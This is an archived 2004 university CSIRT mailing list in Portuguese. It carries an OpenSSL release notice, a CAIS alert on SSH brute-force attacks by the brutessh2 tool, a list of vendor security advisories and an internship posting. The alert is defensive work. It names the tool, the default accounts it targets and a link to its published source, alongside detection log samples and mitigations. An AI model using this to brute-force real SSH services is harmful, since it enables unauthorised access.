Fix race condition in CRL checking code. o Fixes to PKCS#7 (S/MIME) code. We consider OpenSSL 0.9.7e to be the best version of OpenSSL available and we strongly recommend that users of older versions upgrade as soon as possible. OpenSSL 0.9.7e is available for download via HTTP and FTP from the following master locations (you can find the various FTP mirrors under http://www.openssl.org/source/mirror.html): o http://www.openssl.org/source/ o ftp://ftp.openssl.org/source/ The distribution file name is: o openssl-0.9.7e.tar.gz MD5 checksum: a8777164bca38d84e5eb2b1535223474 The checksums were calculated using the following command: openssl md5 < openssl-0.9.7e.tar.gz Yours, The OpenSSL Project Team... Mark J. Cox Ben Laurie Andy Polyakov Ralf S. Engelschall Richard Levitte Geoff Thorpe Dr. Stephen Henson Bodo Möller Lutz Jänicke Ulf Möller -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (GNU/Linux) iQCVAwUBQX0CP+6tTP1JpWPZAQELoAP+IIx6Sx63eQMh9+MdrIPqIXltssJEvAFB eX908DMg3xpH4quEI4AwJauc9ro1rz4t8Oyb9RYbDBLHmqWUVNmCPvQtja+vbSfh z5aYxHL8jsyQwiiSgWpMhW9mSnQKMIFFZjrdNYFsAgx9lhvFhovHKaP3pV/6/qmP SJJPGoBw2ew= =xDxl -----END PGP SIGNATURE----- ______________________________________________________________________ OpenSSL Project http://www.openssl.org User Support Mailing List openssl-users em openssl.org Automated List Manager majordomo em openssl.org ----- End forwarded message ----- From security em unicamp.br Wed Oct 27 09:04:51 2004 From: security em unicamp.br (CSIRT - UNICAMP) Date: Wed, 27 Oct 2004 09:04:51 -0300 Subject: [SECURITY-L] CAIS-Alerta: Ataques de forca bruta contra o servico SSH Message-ID: <20041027120451.GA18191@unicamp.br> ----- Forwarded message from Centro de Atendimento a Incidentes de Seguranca ----- From: Centro de Atendimento a Incidentes de Seguranca Subject: CAIS-Alerta: Ataques de forca bruta contra o servico SSH To: rnp-alerta em cais.rnp.br, rnp-seg em cais.rnp.br Date: Tue, 26 Oct 2004 17:09:43 -0300 (BRST) -----BEGIN PGP SIGNED MESSAGE----- Prezados, O CAIS esta' acompanhando desde meados de Agosto um aumento de atividade anomala cujo alvo e' o servico SSH. Esta atividade foi detectada em sensores do CAIS, incidentes reportados e em listas de discussao diversas. Trata-se de uma ferramenta de forca bruta contra o servico SSH, brutessh2, tornada publica em 20 de Agosto. O brutessh2 usa um conjunto de 2823 duplas usuario/senha para tentar obter acesso ao servico. Os usuarios unicos utilizados sao: admin guest root test user A utilizacao desta ferramenta contra um sistema produz o seguinte resultado no arquivo de log (/var/log/secure). Oct 26 02:37:58 lab sshd[19081]: Failed password for guest from xxx.yyy.aaa.bbb port 2525 ssh2 Oct 26 02:38:02 lab sshd[19099]: Failed password for invalid user test from xxx.yyy.aaa.bbb port 2628 ssh2 Oct 26 02:38:03 lab sshd[19115]: Failed password for root from xxx.yyy.aaa.bbb port 2678 ssh2 Oct 26 02:38:11 lab sshd[19177]: Failed password for admin from xxx.yyy.aaa.bbb port 2921 ssh2 Oct 26 02:38:13 lab sshd[19183]: Failed password for invalid user user from xxx.yyy.aaa.bbb port 2990 ssh2 Oct 26 02:38:50 lab sshd[19477]: Failed password for root from xxx.yyy.aaa.bbb port 4167 ssh2 Sistemas afetados: . Servico SSH, na existencia de usuarios com senhas triviais Correcoes disponiveis: Nao ha correcoes disponiveis por nao se tratar de uma vulnerabilidade no servico SSH. Entretanto, existem maneiras simples de se contornar o problema: . uso de senhas nao triviais; . restringir o acesso remoto do usuario root, passando a usar utilitarios como "sudo" e/ou "su"; . concessao de acesso ao servico SSH somente a hosts conhecidos por meio da adicao de regras a um filtro de pacotes. Mais informacoes: . SSH Remote Root password Brute Force Cracker Utility http://www.k-otik.com/exploits/08202004.brutessh2.c.php O CAIS recomenda que os administradores mantenham seus sistemas e aplicativos sempre atualizados, de acordo com as ultimas versoes e correcoes oferecidas pelos fabricantes. Os Alertas do CAIS tambem sao oferecidos no formato RSS/RDF: http://www.rnp.br/cais/alertas/rss.xml Atenciosamente, ################################################################ # CENTRO DE ATENDIMENTO A INCIDENTES DE SEGURANCA (CAIS) # # Rede Nacional de Ensino e Pesquisa (RNP) # # # # cais em cais.rnp.br http://www.cais.rnp.br # # Tel. 019-37873300 Fax. 019-37873301 # # Chave PGP disponivel http://www.rnp.br/cais/cais-pgp.key # ################################################################ -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBQX6vD+kli63F4U8VAQEyLQP9GWq7tjVJSA2YjsgBImGr8PxT1O+aKYpr xjpLzITZ+WHlq88eKhjBKrFi5TwHEoZKtnX0imwcGZgR65crZmEdGXFRTi5WdSY/ lP92MDxccX4TGuSujpygWfUJbsunVlNfQ75C5DqGT+AY0ZFI/kxNoyEkMH8+Vyzb JQu8qBQjXw4= =sTG8 -----END PGP SIGNATURE----- ----- End forwarded message ----- From security em unicamp.br Wed Oct 27 16:36:21 2004 From: security em unicamp.br (CSIRT - UNICAMP) Date: Wed, 27 Oct 2004 16:36:21 -0300 Subject: [SECURITY-L] Vulnerabilidades de seguranca Message-ID: <20041027193621.GA18879@unicamp.br> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Srs. Assinantes, Atualizamos o site do CSIRT (Computer Security Incident Response Team) da Unicamp item Documentos, Vulnerabilidades de Seguranca, URL=http://www.ccuec.unicamp.br/seguranca/index_html?foco=HTML/61785&foco2=HTML/61785/172029 com os seguintes boletins: Anúncio de Segurança do Conectiva Linux: - ---------------------------------------- 27/10/2004 - CLA-2004:880 Assunto: Correção para vulnerabilidade do foomatic. 26/10/2004 - CLA-2004:879 Assunto: Correções para vulnerabilidades no kernel. 25/10/2004 - CLA-2004:878 Assunto: Correções para vulnerabilidades de negação de serviço no pacote zlib. 22/10/2004 - CLA-2004:877 Assunto: nova versao do mozilla. CAIS-Alerta: - ------------ 26/10/2004 Assunto: Ataques de forca bruta contra o servico SSH. 25/10/2004 Assunto: Falso alerta do Fedora-RedHat. Debian Security Advisory: - ------------------------- 21/10/2004 - DSA 573-1 Assunto: vulnerabilidade de seguranca no pacote cupsys. 21/10/2004 - DSA 572-1 Assunto: vulnerabilidade de seguranca no pacote ecartis. 20/10/2004 - DSA 571-1 Assunto: vulnerabilidade de seguranca no pacote libpng3. 20/10/2004 - DSA 570-1 Assunto: vulnerabilidade de seguranca no pacote libpng. Fedora Update Notification: - --------------------------- 26/10/2004 - FEDORA-2004-337 Assunto: Fedora Core 2: cups. 21/10/2004 - FEDORA-2004-348 Assunto: Fedora Core 2: xpdf. Gentoo Linux Security Advisory: - ------------------------------- 21/10/2004 - GLSA 200410-21 Assunto: Apache 2, mod_ssl: Bypass of SSLCipherSuite directive. HP Security Bulletin: - --------------------- 20/10/2004 - HPSBUX01088 Assunto: SSRT4807 rev.0 HP-UX stmkfont local unauthorized privileged access. KDE Security Advisory: - ---------------------- 21/10/2004 Assunto: kpdf integer overflows. Mandrakelinux Security Update Advisory: - --------------------------------------- 21/10/2004 - MDKSA-2004:116 Assunto: vulnerabilidade de seguranca no pacote cups. 21/10/2004 - MDKSA-2004:115 Assunto: vulnerabilidade de seguranca no pacote kdegraphics. 21/10/2004 - MDKSA-2004:114 Assunto: vulnerabilidade de seguranca no pacote gpdf. 21/10/2004 - MDKSA-2004:113 Assunto: vulnerabilidade de seguranca no pacote xpdf. 21/10/2004 - MDKSA-2004:112 Assunto: vulnerabilidade de seguranca no pacote squid. 21/10/2004 - MDKSA-2004:111 Assunto: vulnerabilidade de seguranca no pacote wxGTK2. 21/10/2004 - MDKSA-2004:110 Assunto: vulnerabilidade de seguranca no pacote gaim. 19/10/2004 - MDKSA-2004:108 Assunto: vulnerabilidade de seguranca no pacote cvs. 19/10/2004 - MDKSA-2004:109 Assunto: vulnerabilidade de seguranca no pacote libtiff. Slackware Security Advisory: - ---------------------------- 25/10/2004 - SSA:2004-299-01 Assunto: vulnerabilidade de seguranca nos pacotes apache, mod_ssl, php. 22/10/2004 - SSA:2004-296-01 Assunto: vulnerabilidade de seguranca no pacote gaim. SUSE Security Announcement: - --------------------------- 22/10/2004 - SUSE-SA:2004:037 Assunto: vulnerabilidade de seguranca no pacote libtiff. 20/10/2004 - SUSE-SA:2004:037 Assunto: vulnerabilidade de seguranca no kernel. - -- Computer Security Incident Response Team - CSIRT Universidade Estadual de Campinas - UNICAMP mailto:security at unicamp.br http://www.security.unicamp.br GnuPG Public Key: http://www.security.unicamp.br/security.asc -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (FreeBSD) iD8DBQFBf/hF/UMb1l3gm8IRAsE6AKC8PM+GMfMqgwPMCSTA3o8ssvnAHQCeNbnZ /oJHQvP1CZ3jWJv4Arujm3A= =c2ov -----END PGP SIGNATURE----- From security em unicamp.br Fri Oct 29 16:35:41 2004 From: security em unicamp.br (CSIRT - UNICAMP) Date: Fri, 29 Oct 2004 16:35:41 -0300 Subject: [SECURITY-L] Oportunidade de estagio remunerado no Centro de Computacao da Unicamp Message-ID: <20041029193541.GA22945@unicamp.br> ------------------------------------------------------------------------ Oportunidade de estágio remunerado no Centro de Computação da Unicamp O CCUEC (Centro de Computação da Unicamp) esta selecionando um (1) estagiário(a) para atuar como desenvolvedores de sistemas com ênfase em web services e diretórios. Requisitos Gerais Estar matriculado em curso de nivel superior em Análise de Sistemas ou Engenharia da Computação Disponibilidade para trabalhar em regime de 20, 30 ou 40 horas semanais, das 8:30 às 17:30h; Conhecimentos desejáveis: - Engenharia de Software (Arquiteturas, Java (J2EE), - Sistemas Operacionais (Linux) - WEB (HTML, XML), Apache, Tomcat. - Redes de Computadores (TCP/IP). - Bancos de Dados (MySQL, PostgreSQL) - Redes (TCP/IP) e Seguranca Atividades do estágio: - Participar como membro de equipe em projeto sobre Diretorios (LDAP). - Participar como membro de equipe em projeto de desenvolviemento de sofware em Java. Informações: Os interessados deverão enviar curriculum vitae para estagios em ccuec.unicamp.br , indicando no subject ESTÁGIO SUPORTE DE SOFTWARE LDAP. ------------------------------------------------------------------------